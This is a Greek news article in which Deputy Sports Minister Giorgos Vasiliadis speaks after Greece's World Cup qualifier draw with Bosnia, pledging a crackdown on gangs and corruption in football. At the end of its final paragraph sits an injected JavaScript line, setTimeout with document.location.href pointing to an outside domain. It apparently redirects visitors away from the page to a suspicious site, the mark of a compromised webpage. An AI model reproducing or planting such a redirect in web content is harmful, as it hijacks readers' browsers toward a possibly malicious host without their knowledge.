Βασιλειάδης: Δεν δεχόμαστε «παράγκες» ή συμμορίες

0
5

 

Στον αγώνα της Εθνικής ενάντια στη Βοσνία για τα προκριματικά του Μουντιάλ βρέθηκε ο υφυπουργός Αθλητισμού Γιώργος Βασιλειάδης, όπου η Ελλάδα πήρε την ισοπαλία. Ο κ. Βασιλειάδης τόνισε «Ήταν πολύ ωραίο παιχνίδι και το ευχαριστηθήκαμε. Το θέμα είναι να καταλάβει ο κόσμος ότι το ποδόσφαιρο είναι γιορτή. Έκλεισε με τον καλύτερο τρόπο, όπως πήγε το παιχνίδι. Η Πολιτεία είναι εδώ, θα κάνει το καθήκον της και θα στηρίξει το υγιές κομμάτι».

«Όλος ο αθλητισμός είναι γιορτή, αλλά έχουμε κάνει το ποδόσφαιρο θέμα της δικαιοσύνης και του κοινού ποινικού δικαίου. Επειδή φτάσαμε στο σημείο μηδέν, ελπίζω ότι δεν έχει παρακάτω. Από εδώ και στο εξής μπαίνουμε σε άλλη μέρα», συμπλήρωσε ο κ. Βασιλειάδης.

Όσον αφορά στη συνεργασία με τον προκάτοχό του και νυν υπουργό Δικαιοσύνης, Σταύρο Κοντονή είπε: «Εμείς θα βάλουμε τους κανόνες μέσα στο γήπεδο και εκείνος στον τομέα της δικαιοσύνης, ενώ υπάρχει και το κομμάτι της δημόσιας τάξης. Ακόμη έχουμε πολλά βήματα και είμαστε αποφασισμένοι να τα κάνουμε όλα. Δίνουμε το μήνυμα πως φαινόμενα του παρελθόντος δεν θα γίνουν ανεκτά. Η Πολιτεία δεν δέχεται «παράγκες» ή συμμορίες, που έχουν φτάσει το ποδόσφαιρο σε αυτό το σημείο». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here